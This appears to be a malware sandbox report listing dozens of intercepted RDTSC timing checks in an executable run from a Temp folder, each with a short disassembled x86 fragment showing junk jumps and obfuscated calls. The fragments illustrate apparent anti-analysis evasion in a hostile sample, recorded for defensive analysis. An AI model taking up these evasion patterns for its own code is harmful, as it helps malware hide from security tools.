Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 31BE6A second address: 31BE9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7FDD3F1879h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 31EF36 second address: 31EF60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnl 00007F7FDCFD2296h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F7FDCFD22A3h 0x00000015 ja 00007F7FDCFD2296h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 31DE4D second address: 31DEC0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7FDD3F186Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ebx, dword ptr [ebp+122D19F2h] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a jo 00007F7FDD3F186Bh 0x00000020 pushad 0x00000021 movzx edi, di 0x00000024 popad 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c call 00007F7FDD3F1873h 0x00000031 mov dword ptr [ebp+122D2C2Bh], esi 0x00000037 pop edi 0x00000038 mov eax, dword ptr [ebp+122D0281h] 0x0000003e sub dword ptr [ebp+122D27D6h], esi 0x00000044 push FFFFFFFFh 0x00000046 mov bx, 738Fh 0x0000004a nop 0x0000004b jmp 00007F7FDD3F186Ch 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 pushad 0x00000055 popad 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 327CA1 second address: 327CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 31CE83 second address: 31CE87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 31DEC0 second address: 31DEC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 31DEC5 second address: 31DECA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 316BEA second address: 316BEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 322C70 second address: 322CE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007F7FDD3F1868h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 mov ebx, ecx 0x00000023 sbb bl, FFFFFFC4h 0x00000026 push dword ptr fs:[00000000h] 0x0000002d mov ebx, 0AF08114h 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 mov edi, dword ptr [ebp+122D3C19h] 0x0000003f mov eax, dword ptr [ebp+122D0BBDh] 0x00000045 mov dword ptr [ebp+122D1D25h], eax 0x0000004b push FFFFFFFFh 0x0000004d pushad 0x0000004e mov esi, dword ptr [ebp+122D205Ah] 0x00000054 sbb cx, 4B86h 0x00000059 popad 0x0000005a xor dword ptr [ebp+122D2B4Fh], eax 0x00000060 nop 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 jns 00007F7FDD3F1866h 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 323C4D second address: 323CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122DBB9Eh], edi 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007F7FDCFD2298h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 mov dword ptr [ebp+122D1D87h], ecx 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d mov dword ptr [ebp+122DBB9Eh], ecx 0x00000043 mov eax, dword ptr [ebp+122D06A1h] 0x00000049 or dword ptr [ebp+122D2235h], edi 0x0000004f push FFFFFFFFh 0x00000051 jmp 00007F7FDCFD22A7h 0x00000056 nop 0x00000057 jmp 00007F7FDCFD22A2h 0x0000005c push eax 0x0000005d je 00007F7FDCFD22A2h 0x00000063 jns 00007F7FDCFD229Ch 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 324B7A second address: 324B80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 325CD8 second address: 325CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F7FDCFD2296h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 316BEE second address: 316BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2D7E8E second address: 2D7E9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 ja 00007F7FDCFD2296h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 326D90 second address: 326DB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F7FDD3F1879h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 322CE7 second address: 322CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 325CE7 second address: 325CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 316BF4 second address: 316BFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F7FDCFD2296h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 322CEC second address: 322CF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 32A236 second address: 32A23A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 32D824 second address: 32D828 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 33297C second address: 332982 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 332982 second address: 3329A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F7FDD3F1872h 0x0000000c js 00007F7FDD3F1866h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2C56D1 second address: 2C56D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2C56D7 second address: 2C56DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2C56DB second address: 2C56ED instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F7FDCFD229Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2C56ED second address: 2C56F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3325BF second address: 3325D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7FDCFD2296h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 336844 second address: 3368C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1872h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jg 00007F7FDD3F1866h 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 jo 00007F7FDD3F1868h 0x0000001b push edi 0x0000001c pop edi 0x0000001d popad 0x0000001e mov eax, dword ptr [esp+04h] 0x00000022 jnp 00007F7FDD3F186Ch 0x00000028 pushad 0x00000029 push ecx 0x0000002a pop ecx 0x0000002b push eax 0x0000002c pop eax 0x0000002d popad 0x0000002e mov eax, dword ptr [eax] 0x00000030 pushad 0x00000031 jo 00007F7FDD3F187Ch 0x00000037 jmp 00007F7FDD3F1876h 0x0000003c jmp 00007F7FDD3F1878h 0x00000041 popad 0x00000042 mov dword ptr [esp+04h], eax 0x00000046 push esi 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3368C0 second address: 3368C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 327E51 second address: 327E77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1872h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7FDD3F186Dh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 327F06 second address: 327F0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 327F0A second address: 327F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 32A41E second address: 32A4C4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jc 00007F7FDCFD2296h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d pushad 0x0000000e jmp 00007F7FDCFD22A6h 0x00000013 or eax, 7036AAF5h 0x00000019 popad 0x0000001a push dword ptr fs:[00000000h] 0x00000021 push 00000000h 0x00000023 push eax 0x00000024 call 00007F7FDCFD2298h 0x00000029 pop eax 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e add dword ptr [esp+04h], 0000001Bh 0x00000036 inc eax 0x00000037 push eax 0x00000038 ret 0x00000039 pop eax 0x0000003a ret 0x0000003b mov edi, edx 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 mov eax, dword ptr [ebp+122D0EA9h] 0x0000004a or ebx, dword ptr [ebp+122D3C51h] 0x00000050 push FFFFFFFFh 0x00000052 push edx 0x00000053 call 00007F7FDCFD22A6h 0x00000058 mov dword ptr [ebp+122D1912h], eax 0x0000005e pop edi 0x0000005f pop edi 0x00000060 nop 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F7FDCFD22A8h 0x00000068 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 33CCD8 second address: 33CCDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 33CE2F second address: 33CE73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7FDCFD22A9h 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e jmp 00007F7FDCFD22A7h 0x00000013 jmp 00007F7FDCFD229Ah 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 33CFD3 second address: 33CFDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 33CFDE second address: 33CFE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 33CFE3 second address: 33CFE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 33CFE9 second address: 33CFED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 33CFED second address: 33CFF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 33D15B second address: 33D15F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 33D15F second address: 33D163 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 33D163 second address: 33D169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 33D169 second address: 33D1A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1873h 0x00000007 pushad 0x00000008 jmp 00007F7FDD3F1876h 0x0000000d jmp 00007F7FDD3F186Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 33D5D5 second address: 33D5F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD22A4h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F7FDCFD229Ah 0x00000011 pushad 0x00000012 popad 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 33D5F9 second address: 33D5FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 342E5C second address: 342E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 342E62 second address: 342E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 341E64 second address: 341E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7FDCFD22A8h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 341E80 second address: 341E86 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 341E86 second address: 341E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 341E8C second address: 341EAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 341EAD second address: 341EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 34231A second address: 34231F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 34231F second address: 34232C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 ja 00007F7FDCFD2296h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 341903 second address: 341907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 342633 second address: 34263F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F7FDCFD2296h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 34263F second address: 342650 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7FDD3F186Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 342650 second address: 34267B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F7FDCFD229Bh 0x0000000b jmp 00007F7FDCFD22A8h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 342902 second address: 342906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 342906 second address: 34290A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3461F2 second address: 3461FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30F4E1 second address: 30F4E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30F4E5 second address: 30F4EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30F4EB second address: 30F527 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F7FDCFD2296h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jns 00007F7FDCFD229Eh 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push eax 0x0000001a push edx 0x0000001b jbe 00007F7FDCFD22A9h 0x00000021 jmp 00007F7FDCFD22A3h 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30F527 second address: 30F571 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F7FDD3F1879h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push ebx 0x0000000e jmp 00007F7FDD3F1876h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F7FDD3F186Bh 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30F5F5 second address: 30F5F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30F5F9 second address: 30F62A instructions: 0x00000000 rdtsc 0x00000002 je 00007F7FDD3F187Eh 0x00000008 jmp 00007F7FDD3F1878h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jl 00007F7FDD3F1872h 0x00000016 jc 00007F7FDD3F186Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30F6E7 second address: 30F6EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30FDB1 second address: 30FDB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30FDB5 second address: 30FDED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 0000001Eh 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F7FDCFD2298h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D2AB1h], edi 0x0000002c nop 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 jne 00007F7FDCFD2296h 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30FDED second address: 30FDF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30FDF6 second address: 30FE14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7FDCFD22A3h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3101EA second address: 31023B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7FDD3F1866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007F7FDD3F186Ch 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F7FDD3F1868h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e lea eax, dword ptr [ebp+12483CC8h] 0x00000034 mov dword ptr [ebp+122DBB9Eh], eax 0x0000003a nop 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e jc 00007F7FDD3F1866h 0x00000044 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2F4885 second address: 2F488B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2F488B second address: 2F48AB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7FDD3F1866h 0x00000008 jmp 00007F7FDD3F1873h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3467CA second address: 3467CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
